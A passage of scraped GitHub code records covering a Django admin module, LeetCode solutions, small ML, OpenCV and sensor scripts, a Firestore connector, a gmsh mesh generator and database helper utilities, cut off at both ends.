self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(eventpagecontent__page__event__team=request.user).distinct()\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(CoachAdmin, self).get_form(request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'eventpagecontent' in form.base_fields:\n qs = EventPageContent.objects.filter(\n page__event__team=request.user)\n form.base_fields['eventpagecontent'].queryset = qs\n return form\n\n\nclass PostmortemAdmin(admin.ModelAdmin):\n list_display = ('event', 'attendees_count', 'applicants_count')\n raw_id_fields = ('event',)\n\n def get_changeform_initial_data(self, request):\n initial = super(PostmortemAdmin,\n self).get_changeform_initial_data(request)\n if \"event\" in request.GET:\n event = Event.objects.get(pk=request.GET['event'])\n initial['event'] = event\n return initial\n\n\nclass UserAdmin(auth_admin.UserAdmin):\n fieldsets = (\n (None, {'fields': ('email', 'password')}),\n ('Personal info', {'fields': ('first_name', 'last_name')}),\n ('Permissions', {'fields': ('is_active', 'is_staff', 'is_superuser',\n 'groups', 'user_permissions')}),\n ('Important dates', {'fields': ('last_login', 'date_joined')}),\n )\n limited_fieldsets = (\n (None, {'fields': ('email',)}),\n ('Personal info', {'fields': ('first_name', 'last_name')}),\n ('Important dates', {'fields': ('last_login', 'date_joined')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('email', 'password1', 'password2')\n }),\n )\n form = UserChangeForm\n limited_form = UserLimitedChangeForm\n add_form = UserCreationForm\n change_password_form = auth_admin.AdminPasswordChangeForm\n list_display = ('email', 'first_name', 'last_name', 'is_superuser', 'date_joined')\n list_filter = ('event', 'is_staff', 'is_superuser', 'is_active', 'groups', 'date_joined')\n search_fields = ('first_name', 'last_name', 'email')\n ordering = ('email',)\n readonly_fields = ('last_login', 'date_joined',)\n\n def get_queryset(self, request):\n qs = super(UserAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(pk=request.user.pk)\n\n def get_form(self, request, obj=None, **kwargs):\n defaults = {}\n if obj and not request.user.is_superuser:\n defaults.update({\n 'form': self.limited_form,\n 'fields': admin.util.flatten_fieldsets(self.limited_fieldsets),\n })\n defaults.update(kwargs)\n return super(UserAdmin, self).get_form(request, obj, **defaults)\n\n def get_fieldsets(self, request, obj=None):\n if obj and not request.user.is_superuser:\n return self.limited_fieldsets\n return super(UserAdmin, self).get_fieldsets(request, obj)\n\n\nclass StoryAdmin(admin.ModelAdmin):\n list_display = ('name', 'is_story', 'created')\n search_fields = ('name', 'content')\n list_filter = ('is_story',)\n\n\nclass MyFlatPageAdmin(FlatPageAdmin):\n\n class MyFlatpageForm(FlatpageForm):\n template_name = forms.CharField(\n initial='flatpage.html',\n help_text=\"Change this only if you know what you are doing\")\n\n form = MyFlatpageForm\n\nadmin.site.unregister(FlatPage)\nadmin.site.register(FlatPage, MyFlatPageAdmin)\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventPage, EventPageAdmin)\nadmin.site.register(EventPageContent, EventPageContentAdmin)\nadmin.site.register(EventPageMenu, EventPageMenuAdmin)\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Sponsor, SponsorAdmin)\nadmin.site.register(Postmortem, PostmortemAdmin)\nadmin.site.register(Coach, CoachAdmin)\nadmin.site.register(Story, StoryAdmin)\n","repo_name":"jxub/djangogirls","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"34627968151","text":"class Solution:\n def isValidSerialization(self, preorder: str) -> bool:\n lst = preorder.split(\",\")\n deg = 1\n\n for idx, s in enumerate(lst):\n if deg == 0:\n return False\n deg += -1 if s == '#' else 1\n\n return deg == 0","repo_name":"zqy1018/my_leetcode","sub_path":"code/331.py","file_name":"331.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"} +{"seq_id":"6008105897","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nclass MultiClassification(nn.Module):\n def __init__(self, layer_sizes, activation = 'relu'):\n super(MultiClassification, self).__init__()\n\n self.n_layers = len(layer_sizes) - 1\n\n self.layers = nn.ModuleList()\n for i in range(self.n_layers):\n self.layers.append(nn.Linear(layer_sizes[i], layer_sizes[i + 1]))\n\n self.activation = None\n if activation == 'relu':\n self.activation = F.relu\n elif activation == 'gelu':\n self.activation = F.gelu\n elif activation == 'elu':\n self.activation = F.elu\n else:\n raise Exception(\"Invalid activation function\")\n\n def forward(self, inputs):\n x = inputs\n\n for i in range(self.n_layers - 1):\n x = self.layers[i](x)\n x = self.activation(x)\n\n x = self.layers[self.n_layers - 1](x)\n\n return x","repo_name":"udellgroup/SketchySGD","sub_path":"deep_learning/models/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24549893918","text":"import numpy as np \nimport imutils\nimport cv2\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required= True, help=\"path to image\")\n\n\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\n\n#this defines the height and width of image\n(h, w) = image.shape[:2]\n#this defines a center point\ncenter = (w / 2, h / 2)\n\n#this rotates our matrix by 45 degrees\nM = cv2.getRotationMatrix2D(center, 45, 5.0)\nrotated = cv2.warpAffine(image, M, (w, h))\ncv2.imshow(\"Rotated by 45 Degrees\", rotated)\ncv2.waitKey(0)\n\n\n#this rotates the image by 90 degrees\n\nM = cv2.getRotationMatrix2D(center, 90, 1.0)\nrotated = cv2.warpAffine(image, M, (w, h))\ncv2.imshow(\"Rotated by 90 degrees\", rotated)\ncv2.waitKey(0)\n\n\nrotated = imutils.rotate(image, 180)\ncv2.imshow(\"Rotated by 180 degrees\", rotated)\ncv2.waitKey(0)","repo_name":"jgerardsimcock/OpenCV_practice","sub_path":"scripts/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23587250511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 15 09:53:08 2017\n\n@author: marshi\n\"\"\"\n\ndef pp_small(ac,aj,c,d):\n if ac == 1 or aj == 1:\n return 2\n else:\n if c[0] > d[0]:\n c,d = d,c\n if (d[1] - c[0]) > 720 and (1440 - (d[0] - c[1]) > 720):\n return 4\n else:\n return 2\n\nif 0:\n ac,aj = 2,0\n c = [180, 540]\n d = [900, 1260]\n \n print(pp_small(ac,aj,c,d))\nelse:\n t = int(input())\n for i in range(t):\n ac,aj = map(int, input().split(' '))\n c = list(map(int, input().split(' ')))\n if ac+aj == 1:\n d = None\n else:\n d = list(map(int, input().split(' ')))\n print(\"Case #%d: %d\"%(i+1, pp_small(ac,aj,c,d)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/138.py","file_name":"138.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73470249155","text":"# Import\nfrom DAH import DS18B20\nimport time\n \n#print(tmp0.getCelsius())\n \nimport pylab\nimport matplotlib.animation as animation\nimport datetime\n# Empty arrays of time and measurement values to plot\ntimeValues = [ ]\nmeasurements = [ ]\n# Set up the plot object\nplotFigure = pylab.figure()\ntmp0 = DS18B20( address=\"10-000803472a99\" )\n\nt_start = time.time()\n\n# The function to call each time the plot is updated\n\ndef updatePlot( i ):\n \n if i < 49:\n timeValues.append( datetime.datetime.now() ) # Store time\n measurements.append( tmp0.getCelsius() ) # Store temperature\n plotFigure.clear() # Clear the old plot\n pylab.plot( timeValues, measurements ) # Make the new plot\n pylab.xlabel(\"Time\")\n pylab.ylabel(\"Temperature\")\n pylab.title(\"Temperature of sensor against time\")\n \n# Make the animated plot\nani = animation.FuncAnimation( plotFigure, updatePlot, interval=1000 )\n\npylab.show()\n\n","repo_name":"faantoniadou/Data-Acquisition-Handling","sub_path":"checkpoint_5b.py","file_name":"checkpoint_5b.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12511075917","text":"# Calculate how many cans of paint we will need to paint a wall with x height and y width\nfrom math import ceil\n\n\ndef paint_calc(width, height, cover):\n cans = (width * height) / cover\n cans = ceil(cans)\n print(f\"You'll need {cans} cans of paint.\")\n\n\ntest_h = int(input(\"Height of wall: \"))\ntest_w = int(input(\"Width of wall: \"))\ncoverage = 5\npaint_calc(height=test_h, width=test_w, cover=coverage)\n","repo_name":"hristo2612/100-days-of-code-python","sub_path":"Day 8 - Function Parameters/8_2_Print_Area_Calculator.py","file_name":"8_2_Print_Area_Calculator.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74520579074","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_blobs\nfrom sklearn.metrics import accuracy_score\n\n\ndef initialisation(X):\n W = np.random.randn(X.shape[1], 1)\n b = np.random.randn(1)\n return (W, b)\n\n\ndef model(X, W, b):\n Z = X.dot(W) + b\n A = 1 / (1 + np.exp(-Z))\n return A\n\n\ndef log_loss(A, y):\n return 1 / len(y) * np.sum(-y * np.log(A) - (1 - y) * np.log(1 - A))\n\n\ndef gradients(A, X, y):\n dW = 1 / len(y) * np.dot(X.T, A - y)\n db = 1 / len(y) * np.sum(A - y)\n return (dW, db)\n\n\ndef update(dW, db, W, b, learning_rate):\n W = W - learning_rate * dW\n b = b - learning_rate * db\n return (W, b)\n\n\ndef predict(X, W, b):\n A = model(X, W, b)\n # print(A)\n return A >= 0.5\n\n\ndef artificial_neuron(X, y, learning_rate=0.1, n_iter=100):\n # initialisation W, b\n W, b = initialisation(X)\n\n Loss = []\n\n for i in range(n_iter):\n A = model(X, W, b)\n Loss.append(log_loss(A, y))\n dW, db = gradients(A, X, y)\n W, b = update(dW, db, W, b, learning_rate)\n\n y_pred = predict(X, W, b)\n print(accuracy_score(y, y_pred))\n plt.figure(\"Loss\", figsize=(14, 14))\n plt.title('Loss')\n plt.plot(Loss)\n\n return (W, b)\n","repo_name":"hichemseriket/monReseauDeNeuronnes","sub_path":"git/newTestIpynb.py","file_name":"newTestIpynb.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17289158827","text":"import time\nimport numpy as np\n#from matplotlib import pyplot as plt\nfrom keras.utils import np_utils\nimport keras.callbacks as cb\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.optimizers import Adam\nfrom keras.datasets import mnist\nimport sys\nfrom optparse import OptionParser\nfrom sklearn.preprocessing import StandardScaler\nimport keras.callbacks as cb\nimport random\n\nif __name__ == \"__main__\":\n\n sdmsingletop = np.genfromtxt('data/dmsingleptop100.txt', delimiter=',')\n sttbar = np.genfromtxt('data/ttbar.txt', delimiter=',')\n sdmttbar = np.genfromtxt('data/ttbardmscalar100.txt', delimiter=',')\n\n #Randomize the events\n np.random.shuffle(sdmsingletop)\n np.random.shuffle(sttbar)\n np.random.shuffle(sdmttbar)\n \n N = 13000\n\n ttbar = sttbar[0:N, :]\n dmttbar = sdmttbar[0:N, :]\n dmsingletop = sdmsingletop[0:N, :]\n\n zeros = np.zeros((np.shape(ttbar)[0], 1))\n ones = np.zeros((np.shape(dmttbar)[0], 1)) + 1\n twos = np.zeros((np.shape(dmsingletop)[0], 1)) + 2\n\n features_ = np.concatenate((ttbar, dmttbar, dmsingletop)) \n categories_ = np.concatenate((zeros, ones, twos))\n\n #Let's mix signal and background together to avoid issues\n mix = list(zip(features_, categories_))\n random.shuffle(mix)\n features_, categories_ = zip(*mix)\n\n scaler = StandardScaler()\n scaler.fit(features_)\n features = scaler.transform(features_)\n nfeatures = np.shape(features)[1]\n categories = np_utils.to_categorical(categories_, num_classes=3)\n\n print('Compiling Model ... ')\n model = Sequential()\n model.add(Dense(20, input_dim=nfeatures))\n model.add(Activation('relu'))\n #model.add(Dropout(0.4))\n #model.add(Dense(10, kernel_initializer='he'))\n model.add(Dense(15))\n model.add(Activation('relu'))\n #model.add(Dropout(0.4))\n #model.add(Dense(5, kernel_initializer='he'))\n model.add(Dense(10))\n model.add(Activation('relu'))\n #model.add(Dropout(0.4))\n #model.add(Dense(3, kernel_initializer='he'))\n model.add(Dense(3))\n model.add(Activation('softmax'))\n adam = Adam(lr=0.005)\n model.compile(loss=\"categorical_crossentropy\", optimizer=adam, metrics=['accuracy'])\n\n model.fit(features, categories, epochs=200, batch_size=200, shuffle = True, validation_split=0.5)\n\n\n\n\n\n\n","repo_name":"cedricpri/TopPlusDMRunIILegacy","sub_path":"neuralNetwork/alternativeTensorFlow/ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25962133030","text":"from tkinter import *\nfrom datetime import datetime\nimport textwrap\n\nfrom src.base_gui import BaseGUI\nfrom src.bubble_start import BotBubble\n\n\nclass ChatScreen2(BaseGUI):\n def __init__(self, master, controller):\n super(ChatScreen2,self).__init__(master,controller)\n self.canvas = Canvas(self, width=500, height=500, bg=\"white\")\n self.canvas.grid(row=0)\n self.bubbles = []\n Button(self, text=\"SHOW INSTRUCTIONS\", command=self.instructions).grid(row=1, column=0)\n Button(self, text=\"NEXT SCREEN\", command=self.next_screen).grid(row=1, column=1)\n\n # This probably needs updating\n def instructions(self):\n messages = [\"We're in! Now we move on to the next phase of our hacking operation!\",\n \"Wouldn't it be funny if we could access this person's facebook account to make a silly post.\",\n \"On the next screen you will see the desktop: Click to open facebook and then attempt to login using the same credentials as before.\",\n \"If we can't get in we will have to try and trick the person into giving us our data! With a phishing attack to their emails.\"]\n for i, msg in enumerate(messages):\n self.canvas.move(ALL, 0, -110)\n a = BotBubble(self.master,self.controller, self.canvas, msg)\n self.bubbles.append(a)\n\n def next_screen(self):\n self.controller.switch_frame(\"image\")\n","repo_name":"AnnaClee/htm2020","sub_path":"src/bubble_second.py","file_name":"bubble_second.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36296255041","text":"import firebase_admin\nfrom firebase_admin import credentials, firestore\nfrom google.cloud.firestore_v1 import Client\n\nfrom utils import *\n\n\n@log_time\ndef connect_db(service_account, project_id):\n try:\n logger.info(\n f\"connect firestore via service key certification - {service_account}\"\n )\n # Use a service account\n cred = credentials.Certificate(service_account)\n firebase_admin.initialize_app(cred)\n except FileNotFoundError:\n logger.info(\n f\"service key certification file not found. use project id - {project_id}\"\n )\n # Use the application default credentials\n cred = credentials.ApplicationDefault()\n firebase_admin.initialize_app(cred, {\"projectId\": project_id, })\n finally:\n client: Client = firestore.client()\n logger.info(\"firestore connected\")\n\n return client\n\n\nclient = connect_db(Config.SERVICE_ACCOUNT, Config.PROJECT_ID)\n","repo_name":"14hy/hanyang-chatbot","sub_path":"server/db/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"28657537234","text":"#!/usr/bin/python3\nimport os, argparse, difflib\n\nlookup = {\n \"flare-form-field\": \"viur-form-bone\",\n \"flare-form-submit\": \"viur-form-submit\",\n \"flare-form\": \"viur-form\",\n\n \"boneField\": \"ViurFormBone\",\n \"sendForm\": \"ViurFormSubmit\",\n \"viurForm\": \"ViurForm\",\n\n \"boneSelector\": \"BoneSelector\",\n \"moduleWidgetSelector\": \"ModuleWidgetSelector\",\n \"displayDelegateSelector\": \"DisplayDelegateSelector\",\n\n \"from flare.forms.formtags import\": \"from flare.viur import\",\n \"from flare.forms\": \"from flare.viur\",\n}\n\nif __name__ == \"__main__\":\n # Get arguments\n ap = argparse.ArgumentParser(\n description=\"Flare source code porting tool\"\n )\n\n ap.add_argument(\n \"project_root\",\n type=str,\n help=\"Flare project root\"\n )\n\n ap.add_argument(\n \"-d\", \"--dryrun\",\n action=\"store_true\",\n help=\"Dry-run for testing, don't modify files\"\n )\n ap.add_argument(\n \"-x\", \"--daredevil\",\n action=\"store_true\",\n help=\"Don't make backups of files, just replace and deal with it\"\n )\n\n args = ap.parse_args()\n\n # Iterate all files in current folder\n for root, dirs, files in os.walk(args.project_root):\n # Ignore ViUR library folders\n if any(ignore in root for ignore in [\"flare\"]):\n continue\n\n for filename in files:\n # Ignore anything without a .py-extension\n ext = os.path.splitext(filename)[1].lower()[1:]\n if ext not in [\"py\"]:\n continue\n\n filename = os.path.join(root, filename)\n\n with open(filename, \"r\") as f:\n original_content = content = f.read()\n\n count = 0\n for k, v in lookup.items():\n if k in content:\n content = content.replace(k, v)\n count += 1\n\n if count:\n if not args.dryrun:\n if not args.daredevil:\n os.rename(filename, filename + \".bak\")\n\n with open(filename, \"w\") as f:\n f.write(content)\n\n print(\"Modified %r\" % filename)\n else:\n print(\n \"\\n\".join(\n difflib.unified_diff(\n original_content.splitlines(),\n content.splitlines(),\n filename,\n filename\n )\n )\n )\n","repo_name":"viur-framework/flare","sub_path":"tools/flare-update.py","file_name":"flare-update.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"40412546719","text":"# THEME_COLOR = \"#375362\"\nTHEME_COLOR = \"#50BAA0\"\nPADDING = 20\nWINDOW_HEIGHT = 10\nWINDOW_WIDTH = 20\nFONT = \"Arial\"\nFONT_SIZE = 15\nFONT_SIZE_L =25\nSM_FONT_SIZE = 10\nLABEL_FONT_SIZE = 15\nFONT_STYLE = \"bold\"\nWHITE = \"white\"\nBTN_COLOR=\"#FA7B52\"\n\nLEFT='w'\nRIGHT = \"e\"\nWINDOW_SIZE = \"600x400\"\nWINDOW_SIZE_L = \"800x400\"\n\n\n#home buttons\nHOME_BTN_HEIGHT = 5\nHOME_BTN_WIDTH = 8\nHOME_BTN_FONT_SIZE = 10\nHOME_BTN_COLOR = '#eab676'\n\n#VAULT BTN WIDTH\nVAULT_BTN_WIDTH = 12\n\n#LOGIN PAGE\nEMAIL_ENTRY_WIDTH = 35\nKEY_ENTRY_WIDTH = 21","repo_name":"manishjoshieng/KeyManager","sub_path":"src/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74179114434","text":"import logging\nfrom functools import wraps\nfrom typing import (Any,\n Optional,\n Callable,\n Coroutine,\n Dict,\n Tuple,\n List)\n\nfrom asyncpg import PostgresError\nfrom pymysql import Error\nfrom sqlalchemy.engine.url import URL\n\nMYSQL_DRIVER_NAME_PREFIX = 'mysql'\n# to make pagination without limit\nMYSQL_MAX_BIGINT_VALUE = 18_446_744_073_709_551_615\n\nlogger = logging.getLogger(__name__)\n\n\ndef handle_exceptions(function: Callable[..., Coroutine]\n ) -> Callable[..., Coroutine]:\n @wraps(function)\n async def decorated(query: str,\n *args: Tuple[Any, ...],\n **kwargs: Dict[str, Any]):\n try:\n res = await function(query, *args, **kwargs)\n return res\n except (Error, PostgresError) as err:\n err_msg = ('Error while processing '\n f'query: \"{query}\".')\n raise IOError(err_msg) from err\n\n return decorated\n\n\ndef is_db_uri_mysql(db_uri: URL) -> bool:\n backend_name = db_uri.get_backend_name()\n return backend_name == MYSQL_DRIVER_NAME_PREFIX\n\n\ndef normalize_pagination(\n *, limit: Optional[int],\n offset: Optional[int],\n is_mysql: bool) -> Tuple[Optional[int], Optional[int]]:\n if is_mysql:\n if limit is None and offset is not None:\n warn_msg = ('Incorrect pagination parameters: '\n 'in MySQL \"offset\" parameter '\n 'should be specified '\n 'along with \"limit\" parameter, '\n 'but \"limit\" parameter '\n f'has value \"{limit}\". '\n f'Assuming that table\\'s primary key '\n f'has \"BIGINT\" type '\n f'and setting limit '\n f'to {MYSQL_MAX_BIGINT_VALUE}.')\n logger.warning(warn_msg)\n return MYSQL_MAX_BIGINT_VALUE, offset\n return limit, offset\n\n\ndef generate_table_columns_names(\n *,\n columns_names: List[str],\n columns_aliases: List[str]) -> List[str]:\n return [f'{column_name} AS {column_alias}'\n for column_name, column_alias in zip(columns_names,\n columns_aliases)]\n\n\ndef generate_table_columns_aliases(\n *,\n columns_names: List[str],\n columns_aliases: Optional[Dict[str, str]] = None) -> List[str]:\n columns_aliases = columns_aliases or {}\n return [\n f'{columns_aliases.get(column_name, column_name)}'\n for column_name in columns_names]\n","repo_name":"lycantropos/cetus","sub_path":"cetus/data_access/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41225661147","text":"import numpy as np\n\n\"\"\"\nThese are fuctions for processing data in the format of structured mesh.\n\"\"\"\ndef concat_zones(zones) -> np.ndarray:\n upper = np.flip(np.concatenate([\n zones[14][:, :-1],\n zones[16][:, :-1],\n zones[18][:, :-1],\n zones[20][:, :-1],\n zones[22],\n ], axis=1), axis=1)\n\n lower = np.flip(np.concatenate([\n np.flip(zones[0].transpose(1, 0, 2, 3),1) [:, :-1],\n zones[1][:, :-1],\n zones[4][:, :-1],\n zones[6][:, :-1],\n zones[8][:, :-1],\n zones[10],\n ], axis=1), axis=0)\n\n inner = np.concatenate([\n upper[:, :-1], \n lower\n ], axis=1)\n\n lower_far = np.flip(np.concatenate([\n zones[2][:, :-1],\n zones[5][:, :-1],\n zones[7][:, :-1],\n zones[9][:, :-1],\n zones[12],\n ], axis=1), axis=0)\n\n upper_far = np.flip(np.concatenate([\n np.flip(zones[3].transpose(1, 0, 2, 3), axis=0)[:, :-1],\n zones[13][:, :-1],\n zones[15][:, :-1],\n zones[17][:, :-1],\n zones[19][:, :-1],\n zones[21],\n ], axis=1), axis=1)\n\n outer = np.concatenate([\n upper_far[:, :-1], \n lower_far\n ], axis=1)\n\n Z = np.concatenate([\n inner, outer\n ]) \n\n return Z\n\ndef convert_to_np(data_dir: str, output_dir: str):\n \"\"\"\n Convert the .dat files to numpy ndarrays. Output is of shape (H, W, I, C).\n \"\"\"\n if not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\n for filename in tqdm(os.listdir(data_dir)):\n if filename.endswith('.dat'):\n path = os.path.join(data_dir, filename)\n with open(path, 'r') as f:\n zones = []\n for line in f:\n if line.startswith('ZONE'):\n settings = {}\n while True:\n line = f.readline().strip()\n if line.startswith(\"DT\"): break\n for pair in line.replace('\\n', '').split(','):\n k, v = pair.split('=')\n settings[k.strip()] = v.strip()\n I, J, K = int(settings['I']), int(settings['J']), int(settings['K'])\n zone = []\n for _ in range(I * J * K):\n zone.append([float(x) for x in f.readline().strip().split(' ')])\n zone = np.array(zone)\n zones.append(zone.reshape(K, J, I, zone.shape[-1]))\n Z = concat_zones(zones)\n aoa = float(settings.get('AUXDATA Common.AngleOfAttack').strip('\"'))\n mach = float(settings.get('AUXDATA Common.ReferenceMachNumber').strip('\"'))\n target = os.path.join(output_dir, filename.replace('deg.dat',f'_{mach}'))\n np.save(target, Z)\n\ndef process_zones(filename: str):\n with open(filename, 'r') as f:\n zones = []\n for line in f:\n if line.startswith('ZONE'):\n settings = {}\n while True:\n line = f.readline().strip()\n if line.startswith(\"DT\"): break\n for pair in line.replace('\\n', '').split(','):\n k, v = pair.split('=')\n settings[k.strip()] = v.strip()\n # I, J, K = int(settings['I']), int(settings['J']), int(settings['K'])\n I, K = int(settings['I']), int(settings['K'])\n\n zone = []\n for _ in range(I * K):\n zone.append([float(x) for x in f.readline().strip().split(' ')])\n zone = np.array(zone)\n zones.append(zone.reshape(K, I, zone.shape[-1]))\n Z = concat_zones(zones)\n aoa = float(settings.get('AUXDATA Common.AngleOfAttack').strip('\"'))\n mach = float(settings.get('AUXDATA Common.ReferenceMachNumber').strip('\"'))\n # np.save(filename.replace('deg.dat',f'_{mach}'), Z)\n return Z, zones\n\ndef generate_mesh(contour, save_path, visualize=False):\n \"\"\"\n This function generates mesh for an airfoil from specified options.\n TODO: add more options and finer control.\n \"\"\"\n import gmsh\n gmsh.initialize()\n gmsh.model.add('new model')\n lc = 0.002\n \n airfoil_points = []\n for point in contour:\n x, y = point\n airfoil_points.append(gmsh.model.geo.add_point(x, y, 0, lc))\n airfoil_points.append(airfoil_points[0])\n \n top = gmsh.model.geo.add_point(0, 10, 0, 500*lc)\n center = gmsh.model.geo.add_point(0, 0, 0, 500*lc)\n bottom = gmsh.model.geo.add_point(0, -10, 0, 500*lc)\n arc = gmsh.model.geo.add_circle_arc(top, center, bottom)\n\n top_right = gmsh.model.geo.add_point(10, 10, 0, 1000*lc)\n bottom_right = gmsh.model.geo.add_point(10, -10, 0, 1000*lc)\n rec = gmsh.model.geo.add_polyline([top, top_right, bottom_right, bottom])\n \n airfoil = gmsh.model.geo.add_spline(airfoil_points)\n \n surface = gmsh.model.geo.add_plane_surface([\n gmsh.model.geo.add_curve_loop([arc, -rec]), # farfield\n gmsh.model.geo.add_curve_loop([airfoil]) \n ])\n gmsh.model.geo.synchronize()\n\n airfoil_tag = gmsh.model.add_physical_group(1, [airfoil])\n gmsh.model.set_physical_name(1, airfoil_tag, 'airfoil')\n farfield_tag = gmsh.model.add_physical_group(1, [arc, -rec])\n gmsh.model.set_physical_name(1, farfield_tag, 'farfield')\n surface_tag = gmsh.model.add_physical_group(2, [surface])\n gmsh.model.set_physical_name(2, surface_tag, 'surface')\n\n gmsh.model.mesh.generate(2)\n gmsh.write(save_path)\n\n if visualize:\n gmsh.fltk.run()\n gmsh.finalize()\n\ndef read_dat(file_name):\n profile = []\n with open(file_name, 'r') as f:\n for line in f.readlines():\n if not line.startswith('#'):\n x, y = line.strip().split()\n profile.append((float(x), float(y)))\n return profile\n\n","repo_name":"btx0424/Field-Prediction","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41029199625","text":"import pickle\nimport torch\nimport numpy as np\n\nmean, std = [], []\nfor name in ['grayscale', 'brighterror', 'angleerror', 'occlude', 'blur', 'biterror']:\n with open(f\"inception_{name}.pkl\", 'rb') as f:\n info = pickle.load(f)\n mean.append(info['mean'][None, :]) \n std.append(info['std'][None, :])\nmean = torch.from_numpy(np.concatenate(mean, axis=0))\nstd = torch.from_numpy(np.concatenate(std, axis=0))\nprint(mean.shape, std.shape)\n","repo_name":"SimKarras/IQA-MetricLearning","sub_path":"src/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14296950779","text":"\"\"\"\n238. Product of Array Except Self\nhttps://leetcode.com/problems/product-of-array-except-self/\n\"\"\"\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n # Hash map – O(1) space except for result\n # [0] Initialize a result array res = [1] + [0] * (n-1)\n # [1] Left product: Get product of elements to the left of each i: for eac i in range(1,n): res[i] = nums[i-1] * res[i-1]\n # [2] right product: for i in reversed(range(n)): have a product of all elemnts of right\n # p and set res[i] *= p and multiply p by nums[i]\n # O(n) time and O(1) space except for result\n n = len(nums)\n res = [1] + [0] * (n-1)\n for i in range(1, n):\n res[i] = nums[i-1] * res[i-1]\n p = 1\n for i in reversed(range(n)):\n res[i] *= p\n p *= nums[i]\n return res\n\n # Hash map\n # [1] Construct 2 arrays that are the products of all elements to the left (and right resp)\n # of the element.\n # [2] for each i multiply these the ith entry of l and r to get the result\n # O(n) time and O(n) space\n n = len(nums)\n l, r = [0]*n, [0] *n\n l[0] = 1\n p = 1\n for i in range(1, n):\n p *= nums[i-1]\n l[i] = p\n p = 1\n for i in range(n-1, 0, -1):\n r[i] = p\n p *= nums[i]\n r[0] = p\n return [l[i] * r[i] for i in range(n)]\n","repo_name":"mathvolcano/leetcode","sub_path":"0238_productExceptSelf.py","file_name":"0238_productExceptSelf.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34739925889","text":"from common.utilities.sql import sql_execute_with_parameters, sql_execute\nfrom geoprocessing.data_access.data_access_utilities import insert_clean_up_string\n\n__author__ = 'erezrubinstein'\n\n\n\ndef insert_company_competition(competitors, database_name = None):\n # create temp table to insert into. This speeds up the insert tremendously because the SQL table insert will be done in batch with one transaction\n sql_statements = ['''\nCREATE TABLE #competitive_companies(home_company_id int NOT NULL, away_company_id int NOT NULL, competition_strength float NOT NULL,\ncreated_at datetime NOT NULL, updated_at datetime NOT NULL, assumed_start_date datetime NULL, assumed_end_date datetime NULL)''']\n\n for competitor in competitors:\n\n # create statement. This is compacted into one line on purpose. It seems to finish much faster on large data sets\n # ER - the below statements uses literals instead of parameters so because of an SQL Server parameter limitation\n sql_statements.append('''INSERT INTO #competitive_companies (home_company_id, away_company_id, competition_strength, created_at, updated_at, assumed_start_date, assumed_end_date)\nVALUES (%d, %d, %s, GETUTCDATE(), GETUTCDATE(), '%s', %s);\n''' % (competitor.home_company_id, competitor.away_company_id, str(competitor.competition_strength), competitor.start_date, insert_clean_up_string(competitor.end_date)))\n\n\n # add insert into 